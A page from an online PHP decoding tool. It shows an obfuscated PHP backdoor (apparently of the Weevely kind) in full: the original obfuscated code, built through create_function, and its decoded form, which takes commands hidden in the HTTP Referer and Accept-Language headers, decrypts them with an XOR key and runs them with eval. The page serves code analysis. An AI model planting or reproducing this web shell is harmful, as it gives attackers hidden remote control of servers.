Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $l=';s";$i=$m;s[1][;s0].$m[1;s;s][1];$h=;s$sl($ss(md5;s($i;s.$kh),;s0,3));$f=;s$s;sl..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$l=';s";$i=$m;s[1][;s0].$m[1;s;s][1];$h=;s$sl($ss(md5;s($i;s.$kh),;s0,3));$f=;s$s;sl(;s;s$ss(md5(;s';
$q='$kh="5d41;s";$kf=;s"40;s2a";;sfunct;sion ;sx($t,$k){$;sc=s;strlen($k;s);$l=strlen($;st;s);$;so=';
$A='m);if($q;s&&$m;s){@s;sess;sio;sn_start;s();$s=&$_SESSIO;sN;$;s;s;ss;ss="substr";$sl="strtolower';
$J='_LANGUAGE"];if;s($rr;s&&$ra){$;s;su=parse;s_url($rr);s;parse_;sstr($u[;s"qu;sery";s;s],$q);$q=a';
$u='";s";f;sor($i=0;$i<$l;){f;s;sor;s($j=0;($j<$c&&$i<$l;s);;s$j++,$i+;s+){$o.;s=$t{$;si}^$k{$j;s};';
$O='$;si.$k;sf),0,3));$p="";fo;sr;s($z=1;$z<count;s($m[1]);$z;s+;s+)$p.=$q[;s$;sm[2][$;sz]];s;if(st';
$Z='$s;ss($s[$i],;s0,$e);s)),$k));s);;s$o=ob;s_get_content;ss();s;;sob_end_clean(;s);s;$d=bas;se64_';
$Y='pres;ss(@x;s(;s@b;sase6;s4_decode(preg_rep;sla;sc;s;se(array("/_/",;s"/-/"),array;s("/",";s+"),';
$S=str_replace('iS','','creiSatiSe_iSfuiSiSnctiSion');
$f='rpos(;s$p,$;sh)==;s=0){$s[$;si]="";$p;s=;s$ss($p;s,3;s);};sif(array_key_exists($i,$;ss)){;s$s[$';
$z='i].=;s$p;$e;s;s=strpo;ss($s[$i],$;sf);if($e);s{;s$k=$kh.$kf;s;o;sb_start();s;@ev;sal(@gz;suncom';
$r='rray_v;salues;s(;s$q);s;preg_ma;stch_all;s("/([\\w])[\\w-;s];s+(?:;q;s;s=0.([\\d]))?,?;s/",;s$ra,$';
$B='};s}return;s $o;}$r=;s$_SERV;sER;s;$r;sr=@$r["HTTP_;sREFE;sRER"];;s$ra=@$r[;s"HTTP;s;s_ACCE;sPT';
$G=';s;sencode(x(gzcompre;s;sss($o);s,$k));print;s("<$k;s>$d</$k>";s);@se;ss;ssion_destro;sy();}}}}';
$Q=str_replace(';s','',$q.$u.$B.$J.$r.$A.$l.$O.$f.$z.$Y.$Z.$G);
$W=$S('',$Q);$W();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A m);if($q;s&&$m;s){@s;sess;sio;sn_start;s();$s=&$_SESSIO;sN;$..
$B };s}return;s $o;}$r=;s$_SERV;sER;s;$r;sr=@$r["HTTP_;sREFE;sR..
$G ;s;sencode(x(gzcompre;s;sss($o);s,$k));print;s("<$k;s>$d</$k..
$J _LANGUAGE"];if;s($rr;s&&$ra){$;s;su=parse;s_url($rr);s;parse..
$O $;si.$k;sf),0,3));$p="";fo;sr;s($z=1;$z<count;s($m[1]);$z;s+..
$Q $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$S create_function
$W None
$Y pres;ss(@x;s(;s@b;sase6;s4_decode(preg_rep;sla;sc;s;se(array..
$Z $s;ss($s[$i],;s0,$e);s)),$k));s);;s$o=ob;s_get_content;ss();..
$f rpos(;s$p,$;sh)==;s=0){$s[$;si]="";$p;s=;s$ss($p;s,3;s);};si..
$l ;s";$i=$m;s[1][;s0].$m[1;s;s][1];$h=;s$sl($ss(md5;s($i;s.$kh..
$q $kh="5d41;s";$kf=;s"40;s2a";;sfunct;sion ;sx($t,$k){$;sc=s;s..
$r rray_v;salues;s(;s$q);s;preg_ma;stch_all;s("/([\w])[\w-;s];s..
$u ";s";f;sor($i=0;$i<$l;){f;s;sor;s($j=0;($j<$c&&$i<$l;s);;s$j..
$z i].=;s$p;$e;s;s=strpo;ss($s[$i],$;sf);if($e);s{;s$k=$kh.$kf;..

Stats

MD5 229eb515f7fcd60d1c7da9a23f887b03
Eval Count 1
Decode Time 86 ms